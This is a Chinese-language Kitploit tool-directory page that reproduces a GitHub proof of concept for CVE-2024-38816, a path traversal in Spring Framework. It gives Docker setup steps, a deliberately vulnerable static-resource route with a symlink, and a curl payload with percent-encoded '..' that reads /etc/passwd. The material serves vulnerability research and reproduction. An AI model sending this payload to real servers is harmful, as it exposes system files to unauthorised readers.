Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-38816-PoC — CVE-2024-38816 概念验证 | Kitploit
工具/GitHubGitHub/wulinpin/cve-2024-38816-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubwulinpin/cve-2024-38816-poc

CVE-2024-38816-PoC

CVE-2024-38816 概念验证

查看仓库
9761年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-38816 概念验证(PoC)

这是针对 CVE-2024-38816 漏洞的概念验证,演示了一个路径遍历利用。

执行步骤

  1. 构建 Docker 镜像:(Spring Boot 3.0.13,基于 Spring Framework 6.0.3)

    root@kitploit:~
    docker build -t cve-2024-38816-poc .
    
  2. 运行容器并将端口 8080 暴露给宿主机:

    root@kitploit:~
    docker run -d -p 8080:8080 --name cve-2024-38816-poc cve-2024-38816-poc
    
  3. 执行以下命令运行 PoC 并确认漏洞:

    root@kitploit:~
    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    如果显示 /etc/passwd 文件的内容,则漏洞确认存在。

说明

本 PoC 基于对发布说明和提交日志的分析创建。实际漏洞的行为可能有所不同,因此不保证准确性。使用风险自负。

注意事项

  1. 该漏洞已在 Spring Framework 6.1.13 中修复,相关发布说明已确认。

  2. 查看发布说明和相关提交日志后,我确定以下两个问题可能与此漏洞相关:

    • 问题 #33424:添加了与符号链接相关的新选项。
      • 相关提交:5d80d75051f395c17f6b9367e267d458585b336d
    • 问题 #33434:修改了用于清理百分号编码字符的代码。
      • 相关提交:d86bf8b2056429edf5494456cffcb2b243331c49
  3. 根据安全公告,攻击成功可能需要满足以下条件:

    • 使用了 RouterFunctions
    • 使用了 FileSystemResource
    • 存在符号链接
    • 攻击涉及百分号编码字符

环境搭建

使用 Docker 环境复现漏洞。

  1. 使用以下代码创建 PathTraversalDemoApplication.java,通过 RouterFunction 和 FileSystemResource 设置静态文件路由:

    root@kitploit:~
    public RouterFunction<ServerResponse> staticResourceRouter() {
        return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
    }
    
  2. 在 Dockerfile 中添加以下命令以创建符号链接:

    root@kitploit:~
    RUN ln -s /static /app/static/link
    
  3. 构造一个利用百分号编码通过符号链接进行目录遍历的载荷。

    • 路径:/static/link/%2e%2e/etc/passwd
  4. 使用以下 curl 命令执行 PoC 并验证攻击是否成功:

    root@kitploit:~
    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    如果攻击成功,将显示 /etc/passwd 文件的内容。

免责声明

本 PoC 仅供教育和安全研究使用。在实际系统上使用前,请确保漏洞已修复并拥有适当授权。作者不对任何滥用此代码的行为负责。

下载工具